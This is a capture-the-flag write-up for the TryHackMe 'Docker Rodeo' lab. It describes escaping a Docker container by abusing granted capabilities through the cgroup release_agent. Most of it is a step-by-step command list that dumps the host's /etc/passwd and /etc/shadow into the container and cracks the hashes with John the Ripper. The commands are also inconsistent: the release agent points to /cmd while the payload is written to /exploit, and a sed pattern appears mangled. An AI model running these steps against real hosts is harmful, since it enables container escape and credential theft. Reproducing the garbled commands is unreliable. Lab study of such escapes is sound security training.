We covered the fifth part of exploiting Docker containers. We discussed one of the popular methods of escaping Docker containers, that is, exploiting misconfigured permissions, namely, Linux capabilities granted to Dockers. Using this method we can mount specific sensitive files and hashes from the host file system to a directory of our choice on the Docker container. This was part of TryHackMe The Docker Rodeo.
Summary of the Container Escape Method
The core of this method lies in exploiting Linux capabilities that might be granted to a Docker container. Normally, Docker containers operate in a user mode and rely on the Docker engine to interact with the host operating system. However, if a container is given certain Linux capabilities, it can run in a privileged or root mode, allowing it to directly interact with the host OS kernel without needing the Docker engine.
My goal was to mount files from the host file system into the container. This would allow me to read sensitive files like /etc/passwd
or /etc/shadow
directly from the host machine.
The exploitation process primarily uses Cgroups (Control Groups) to interact with the host OS. I executed a series of commands to:
- Create a Cgroup directory.
- Define a path within the container that would be used to mount files from the host.
- Create an exploit script within this path. This script contained commands to copy desired files from the host to a location accessible within the container.
- The crucial part of the exploit was dumping the contents of host files (like
/etc/passwd
,/etc/shadow
, or a flag file) into files within the container’s designated path. - Finally, I made the exploit script executable and ran it.
After successfully executing the exploit, the contents of the targeted host files became available within the container. For instance, I was able to retrieve the /etc/passwd
and /etc/shadow
files from the host.
With access to the shadow file, the next logical step would be to crack the password hashes (for example, using tools like John the Ripper or Hashcat) to gain access to user accounts on the host system, thereby fully escaping the container.
Technical Commands Used in the Terminal
Here are the technical commands I used during the demonstration:
id
: To check the current user ID within the container.ls /
: To list the contents of the root directory of the container.cat /.dockerenv
: To confirm being inside a Docker container by checking for the.dockerenv
file.capsh --print
: To print the current capabilities of the Docker container.capsh --print | grep admin
: To specifically search for capabilities containing “admin”.mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
: Creates directories for Cgroup and mounts it.ls -la /tmp | grep cgroup
: To verify the creation of the Cgroup directory.echo 1 > /tmp/cgrp/x/notify_on_release
: Configures notification on release for the Cgroup.host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
: Gets the host path and assigns it to thehost_path
variable.echo "$host_path/cmd" > /tmp/cgrp/release_agent
: Sets the release agent for the Cgroup to a script namedcmd
in the host path.echo '#!/bin/sh' > /cmd
: Creates a script namedcmd
and adds the shebang.echo "cat /etc/passwd > $host_path/password.txt" >> /exploit
: Appends a command to the exploit script to copy the host’s/etc/passwd
file topassword.txt
in the container’s mounted path.echo "cat /root/flag.txt > $host_path/flag.txt" >> /exploit
: Appends a command to copy the flag file.cat /exploit
: To display the contents of the exploit script.chmod a+x /exploit
: Makes the exploit script executable.sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
: Triggers the release agent.pwd
: Print working directory.ls -la
: List directory contents in long format, including hidden files.cat flag.txt
: Displays the content offlag.txt
.cat password.txt
: Displays the content ofpassword.txt
.cd /home
: Change directory to/home
.ls -a
: List all files, including hidden ones.rm /exploit
: Removes the existing exploit script.echo '#!/bin/sh' > /exploit
: Recreates the exploit script with shebang.echo "cat /etc/shadow > $host_path/hashes.txt" >> /exploit
: Appends command to copy/etc/shadow
tohashes.txt
.chmod a+x /exploit
: Makes the new exploit script executable.sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
: Triggers the release agent again.cat hashes.txt
: Displays the content ofhashes.txt
.nano hashes
: Opens thehashes
file in the nano editor (on the attacker’s machine, not in the container).john --wordlist=/usr/share/wordlists/rockyou.txt hashes
: Attempts to crack the hashes using John the Ripper with the rockyou wordlist (on the attacker’s machine).cd /usr/share/wordlists
: Navigates to the wordlists directory (on the attacker’s machine).
This detailed explanation covers the method and the specific commands I used to demonstrate how to escape a Docker container by exploiting misconfigured Linux capabilities.
Room Answers
What is the name of the repository within this registry?
What is the name of the tag that has been published?
What is the Username in the database configuration?
What is the Password in the database configuration?
Using Dive, how many “Layers” are there in this image?
What user is successfully added?